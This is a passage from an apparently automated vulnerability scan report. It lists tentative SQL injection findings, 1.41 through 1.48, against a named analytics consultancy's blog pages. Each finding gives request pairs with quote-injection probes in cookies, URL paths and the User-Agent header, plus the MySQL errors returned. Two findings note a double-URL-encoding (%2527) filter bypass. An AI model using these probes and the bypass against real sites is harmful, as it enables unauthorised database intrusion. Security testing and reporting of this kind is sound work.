Date: Sat, 06 Nov 2010 07:09:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:09:56 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:09:56 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21634


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.41. http://www.analyticspros.com/blog/55-googleanalytics/89-dont-kill-the-messenger.html [1ee73a388da0bb7ec3d7afe3beccac53 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/89-dont-kill-the-messenger.html

Issue detail

The 1ee73a388da0bb7ec3d7afe3beccac53 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 1ee73a388da0bb7ec3d7afe3beccac53 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the 1ee73a388da0bb7ec3d7afe3beccac53 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/89-dont-kill-the-messenger.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:59:17 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/89-dont-kill-the-messenger.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00%2527%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:59:18 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:59:20 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:59:20 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23610


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.42. http://www.analyticspros.com/blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics'/91-google-analytics-cookies-and-domains.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:14:16 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics''/91-google-analytics-cookies-and-domains.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:14:17 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:14:19 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:14:20 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51606


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.43. http://www.analyticspros.com/blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)'
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:12:24 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)''
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:12:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:12:26 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:12:26 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51710


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.44. http://www.analyticspros.com/blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:58:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)''; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:58:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.45. http://www.analyticspros.com/blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html [ki_t cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html

Issue detail

The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:58:40 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:58:40 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:58:43 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:58:43 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51581


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.46. http://www.analyticspros.com/blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1'; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:55:41 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1''; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:55:42 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.47. http://www.analyticspros.com/blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html [__utmb cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937'; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:59:15 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937''; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:59:15 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.48. http://www.analyticspros.com/blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html [apros2.0_tpl cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0'; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

